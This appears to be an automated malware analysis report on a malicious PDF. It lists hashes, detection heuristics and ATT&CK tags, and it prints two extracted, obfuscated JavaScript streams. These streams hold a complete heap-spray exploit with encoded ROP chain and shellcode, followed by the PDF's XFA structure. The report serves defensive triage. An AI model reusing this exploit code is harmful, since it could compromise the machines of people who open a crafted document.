Malicious PDF — malware analysis report

Static analysis result for SHA-256 dd227eb5bb15ff1b…

MALICIOUS

PDF

61.6 KB First seen: 2026-05-10
MD5: 3513574cf80f304d1d29d458eba399e0 SHA-1: 68ebb0dcb7d10b864b49ff83ece4c27986f11351 SHA-256: dd227eb5bb15ff1b041a891f4de839d5eb1f9a5e2b0a1ec5ea5c7190018df0aa
78 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The presence of ASCIIHexDecode filter with exploit indicators suggests an attempt to obfuscate malicious content. While the document body is unreadable, the embedded JavaScript is the primary mechanism for attack. The extracted URLs are related to XFA forms, which are often targeted for exploitation.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 6

  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xdp/ Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xE3EC 3831 bytes
SHA-256: 55c5ed1db34532c6a53a265f77213b8061670a609a15892a865b5e45e3d477d9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
6 of 10 identifiers look randomly generated (e.g. 'kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePd') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var hDVCURdDaCqCmPAmpTsHTCNuiugQyjzLcsmWuxraRkHylRIraWGOWvxgKPAzgaX = unescape;
var weSWVZLQqxfESiRCjjkAGRYcUrobENItbetEqXtfORjQcJAYQZVxETOaklKOIcMYGnpoqDaGgJUmJg = hDVCURdDaCqCmPAmpTsHTCNuiugQyjzLcsmWuxraRkHylRIraWGOWvxgKPAzgaX( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc929%u49b1%u81bb%u2a63%udbae%ud9c9%u2474%u58f4%u5831%u8310%ufce8%u5803%u630c%ud696%uea46%u2759%u8c97%uc2d0%u9ea6%u8787%u2e9b%ucac3%uc517%ufe81%uabac%uf00d%u0105%u3f68%ua495%u93b4%ua755%uee48%u0789%u2170%u46dc%u5cb5%u1a2f%u2a6e%u8a82%u6e1b%uab1f%ue4cb%ud31f%u3a6e%u69eb%u6b70%ue644%u933a%ua0ee%ua29a%ub323%uede7%u0748%uef93%u5698%ude5c%u34e4%uee63%u45e8%uc9a3%u3012%u29df%u42ae%u5324%uc774%uf3b9%u7fff%u051a%u19d3%u09e9%u6e98%u0db5%ua31f%u2acd%u4294%ubb02%u60ee%ue786%u09b5%u4d9f%u361b%u2aff%u92c4%ud98b%ua411%ub5d1%u9ad6%u45e9%uad71%u779a%u05de%u3435%u8397%u3bc2%u7382%uc25c%u832d%u0174%ud379%ua0ee%ub802%u4dee%u6ed7%ue1bf%uce88%u426f%ua679%u4d65%ud6a6%u8785%u7ccf%u407f%u2830%ub87f%u2ad8%ua980%ua344%ua366%ue564%u5c31%uac1c%ufdca%u7be1%u3eb7%u8f69%uf047%ufa9a%u655b%ub16b%u2006%u6c74%ucd2c%u8ae0%u9ae7%u909c%uedde%u6b02%u6635%uf98a%u11f6%uedf3%ue1f6%u67a5%u89f7%ud311%uaca4%uce5d%u7cd8%uf0c8%ud188%u985b%u0f36%u07ab%u7ac8%u742d%u431f%u8cab%ua715%u4177' );
var WKEPB = hDVCURdDaCqCmPAmpTsHTCNuiugQyjzLcsmWuxraRkHylRIraWGOWvxgKPAzgaX( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (WKEPB.length + 20 + 8 < 65536) WKEPB+=WKEPB;
prgjeqZElNOcVNjjJUrTxJvudoYTtlHlqoCMGImbuHLYbWKjMOKmmBtFgfgp = WKEPB.substring(0, (0x0c0c-0x24)/2);
prgjeqZElNOcVNjjJUrTxJvudoYTtlHlqoCMGImbuHLYbWKjMOKmmBtFgfgp += weSWVZLQqxfESiRCjjkAGRYcUrobENItbetEqXtfORjQcJAYQZVxETOaklKOIcMYGnpoqDaGgJUmJg;
prgjeqZElNOcVNjjJUrTxJvudoYTtlHlqoCMGImbuHLYbWKjMOKmmBtFgfgp += WKEPB;
kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb = prgjeqZElNOcVNjjJUrTxJvudoYTtlHlqoCMGImbuHLYbWKjMOKmmBtFgfgp.substring(0, 65536/2);
while(kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb.length < 0x80000) kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb += kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb;
Q = kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb.substring(0, 0x80000 - (0x1020-0x08) / 2);
var AgbLCdSipAzWlhOvBCNlQNkJRpaEJjLVaAiDqHVHxMrkWUEUHerUwwFfxTcrIwALanslrxaNI = new Array();
for (dtvTGdvXcGEIJszbhoYpMKwLxCjyJNTKRCYGjaYsFeBrbwMbNFhbxAAOOaTUGaXSkJWOYStUkY=0;dtvTGdvXcGEIJszbhoYpMKwLxCjyJNTKRCYGjaYsFeBrbwMbNFhbxAAOOaTUGaXSkJWOYStUkY<0x1f0;dtvTGdvXcGEIJszbhoYpMKwLxCjyJNTKRCYGjaYsFeBrbwMbNFhbxAAOOaTUGaXSkJWOYStUkY++) AgbLCdSipAzWlhOvBCNlQNkJRpaEJjLVaAiDqHVHxMrkWUEUHerUwwFfxTcrIwALanslrxaNI[dtvTGdvXcGEIJszbhoYpMKwLxCjyJNTKRCYGjaYsFeBrbwMbNFhbxAAOOaTUGaXSkJWOYStUkY]=Q+"s";
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0xE40E 4717 bytes
SHA-256: ddfe4ff7b3616b26457b741e48b197373e0c9e9dc48d439e62bfac1e60e57d19
Preview script
First 1,000 lines of the extracted script
var hDVCURdDaCqCmPAmpTsHTCNuiugQyjzLcsmWuxraRkHylRIraWGOWvxgKPAzgaX = unescape;
var weSWVZLQqxfESiRCjjkAGRYcUrobENItbetEqXtfORjQcJAYQZVxETOaklKOIcMYGnpoqDaGgJUmJg = hDVCURdDaCqCmPAmpTsHTCNuiugQyjzLcsmWuxraRkHylRIraWGOWvxgKPAzgaX( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc929%u49b1%u81bb%u2a63%udbae%ud9c9%u2474%u58f4%u5831%u8310%ufce8%u5803%u630c%ud696%uea46%u2759%u8c97%uc2d0%u9ea6%u8787%u2e9b%ucac3%uc517%ufe81%uabac%uf00d%u0105%u3f68%ua495%u93b4%ua755%uee48%u0789%u2170%u46dc%u5cb5%u1a2f%u2a6e%u8a82%u6e1b%uab1f%ue4cb%ud31f%u3a6e%u69eb%u6b70%ue644%u933a%ua0ee%ua29a%ub323%uede7%u0748%uef93%u5698%ude5c%u34e4%uee63%u45e8%uc9a3%u3012%u29df%u42ae%u5324%uc774%uf3b9%u7fff%u051a%u19d3%u09e9%u6e98%u0db5%ua31f%u2acd%u4294%ubb02%u60ee%ue786%u09b5%u4d9f%u361b%u2aff%u92c4%ud98b%ua411%ub5d1%u9ad6%u45e9%uad71%u779a%u05de%u3435%u8397%u3bc2%u7382%uc25c%u832d%u0174%ud379%ua0ee%ub802%u4dee%u6ed7%ue1bf%uce88%u426f%ua679%u4d65%ud6a6%u8785%u7ccf%u407f%u2830%ub87f%u2ad8%ua980%ua344%ua366%ue564%u5c31%uac1c%ufdca%u7be1%u3eb7%u8f69%uf047%ufa9a%u655b%ub16b%u2006%u6c74%ucd2c%u8ae0%u9ae7%u909c%uedde%u6b02%u6635%uf98a%u11f6%uedf3%ue1f6%u67a5%u89f7%ud311%uaca4%uce5d%u7cd8%uf0c8%ud188%u985b%u0f36%u07ab%u7ac8%u742d%u431f%u8cab%ua715%u4177' );
var WKEPB = hDVCURdDaCqCmPAmpTsHTCNuiugQyjzLcsmWuxraRkHylRIraWGOWvxgKPAzgaX( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (WKEPB.length + 20 + 8 < 65536) WKEPB+=WKEPB;
prgjeqZElNOcVNjjJUrTxJvudoYTtlHlqoCMGImbuHLYbWKjMOKmmBtFgfgp = WKEPB.substring(0, (0x0c0c-0x24)/2);
prgjeqZElNOcVNjjJUrTxJvudoYTtlHlqoCMGImbuHLYbWKjMOKmmBtFgfgp += weSWVZLQqxfESiRCjjkAGRYcUrobENItbetEqXtfORjQcJAYQZVxETOaklKOIcMYGnpoqDaGgJUmJg;
prgjeqZElNOcVNjjJUrTxJvudoYTtlHlqoCMGImbuHLYbWKjMOKmmBtFgfgp += WKEPB;
kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb = prgjeqZElNOcVNjjJUrTxJvudoYTtlHlqoCMGImbuHLYbWKjMOKmmBtFgfgp.substring(0, 65536/2);
while(kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb.length < 0x80000) kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb += kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb;
Q = kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb.substring(0, 0x80000 - (0x1020-0x08) / 2);
var AgbLCdSipAzWlhOvBCNlQNkJRpaEJjLVaAiDqHVHxMrkWUEUHerUwwFfxTcrIwALanslrxaNI = new Array();
for (dtvTGdvXcGEIJszbhoYpMKwLxCjyJNTKRCYGjaYsFeBrbwMbNFhbxAAOOaTUGaXSkJWOYStUkY=0;dtvTGdvXcGEIJszbhoYpMKwLxCjyJNTKRCYGjaYsFeBrbwMbNFhbxAAOOaTUGaXSkJWOYStUkY<0x1f0;dtvTGdvXcGEIJszbhoYpMKwLxCjyJNTKRCYGjaYsFeBrbwMbNFhbxAAOOaTUGaXSkJWOYStUkY++) AgbLCdSipAzWlhOvBCNlQNkJRpaEJjLVaAiDqHVHxMrkWUEUHerUwwFfxTcrIwALanslrxaNI[dtvTGdvXcGEIJszbhoYpMKwLxCjyJNTKRCYGjaYsFeBrbwMbNFhbxAAOOaTUGaXSkJWOYStUkY]=Q+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000058291 00000 n
0000058348 00000 n
0000062231 00000 n
0000062264 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
62750
%%EOF

Open this report in the interactive analyzer, or submit your own file for analysis.